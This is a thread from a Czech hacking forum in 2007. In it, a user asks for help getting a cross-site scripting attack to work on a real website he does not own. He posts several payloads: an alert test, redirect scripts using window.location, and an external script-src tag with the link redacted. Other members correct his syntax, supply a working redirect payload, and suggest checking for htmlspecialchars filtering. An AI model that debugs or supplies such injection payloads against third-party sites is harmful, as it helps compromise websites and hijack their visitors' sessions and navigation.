XSS- N@k@ z@ludnost
HackForum
| Takze sem zkousel XSS utok na jeden webovy server. Vyzkousel sem <script>alert(1)</script> a okynko mi vyskcilo. rikam ok, a zadam kod
<script>windows.localation.href="[link]"</script>
a nic.. zkusim <script>windows.localation.replace="[link]"</script> a zase nic:( zkusim tedy <script src="[link]"></script> a stale nic! nevite v cem je zrada?
(odpovědět) | | Jaffa | 85.13.78.* | 8.4.2007 14:29 |
|
|
|
| Jaffa:
1) ne localation, ale location
2) windows, ale window
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět) | |
|
|
| nefara sem to akorat tady napsla blbe...:(
(odpovědět) | | Jaffa | 85.13.78.* | 8.4.2007 14:57 |
|
|
|
| Jaffa: třeba tam XSS není možné kvůli htmlspecialchars? podívej se do zdrojáku, jestli znaky jako špičaté závorky nejsou náhodou nahrazeny...:-)
----------
Get enlightened!
(odpovědět) | |
|
|
| Jaffa: Toto by mělo fungovat.
<script>window.location.href="[link]"</script>
Pokud ne, tak napiš URL, ať to testnem...
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět) | |
|
|
| kua ja sem tu stranku zapomnel:D:D:D:D a v historii ji nemam:(( mno nic no ale <script>window.location.href=""</s
cript> nefaralo to wim to sem zkousel
(odpovědět) | | Jaffa | 85.13.78.* | 8.4.2007 15:20 |
|
|
|
| uz vim ten web je [link] sem teda nahodil <script>window.location.href=""</s
cript> abehla prostredni cast stranky prazdna a nic..:(
(odpovědět) | | 3zeeboom | 85.13.78.* | 8.4.2007 17:51 |
|
|
|
| "" a za tohle dáte něco nebo to tam jen tak necháte?
(odpovědět) | Rift |  215692562 | 8.4.2007 17:54 |
|
|
|
| ne to tam jen tag asi enchame:D:D:D omg... samozrejme ze se za to neco da! kam bys jinak echtel pichnout to presmerovani?
(odpovědět) | | 3zeeboom | 85.13.78.* | 8.4.2007 21:08 |
|
|
|
| ja jen že mě to nedalo... :-P
(odpovědět) | | Rift_ | 212.96.190.* | 8.4.2007 21:28 |
|
|
|
